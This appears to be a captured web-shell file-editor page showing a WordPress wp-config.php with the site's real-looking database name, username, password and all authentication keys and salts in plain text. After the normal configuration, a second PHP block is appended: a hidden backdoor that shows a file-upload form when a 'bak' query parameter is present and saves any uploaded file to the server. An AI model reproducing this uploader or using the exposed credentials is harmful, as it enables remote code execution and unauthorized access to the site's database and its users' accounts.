Edit file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'guideinstitutsbe_wp_9ka94' ); /** Database username */ define( 'DB_USER', 'guideinstitutsbe_wp_nvlti' ); /** Database password */ define( 'DB_PASSWORD', '_8MI9&Lzll$4xoJT' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', ';a7zooQ_oR%~6QADKP)N8zyl&1~5])bnw8hu9U+/15!lJnS-v%VrPH70;5_y+k33'); define('SECURE_AUTH_KEY', 'Csbns28S13lu]m5EGr25PC4J4D2*oSPMu11lab[aW670DZu390mHD:@8I-_19yr8'); define('LOGGED_IN_KEY', 't2~b_72GUZzy+ZZ(@@hQFr:A)+lY/~xVJ5dG8*4/3-d75R1wE92*F|r8:A3mepn_'); define('NONCE_KEY', '52~r;~j20y9jefLKX8K663F_jDPY[5%]QJ7J4b8hD8mF#Hv0u-vw6Y30G[w[:X-_'); define('AUTH_SALT', '5Hu5-:gi*~43Sjj9e+fLDKz#CGRs9+Fn~~)7)l:&c#/D@!M37@S|rBUbf14_J4l5'); define('SECURE_AUTH_SALT', '&o3ld~m9yJNU/)kCm2BE;0uK7tcq0%7N4Q6K49f15lcZj]!E#)tlR/)sJ@G+JFjc'); define('LOGGED_IN_SALT', '6301(6!(5q8~[/2/;8)bnb*9W%Q8)LD3W1I:6wZ0;(]O)]ZXCi[3l8UA0T@!7_&i'); define('NONCE_SALT', '1|30Q]rm94(P1C51cs9n*kk3Ix*6Z27*i88])U@a;P1s&89_ltEK)c#]br*5hYNT'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'GAaX2_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save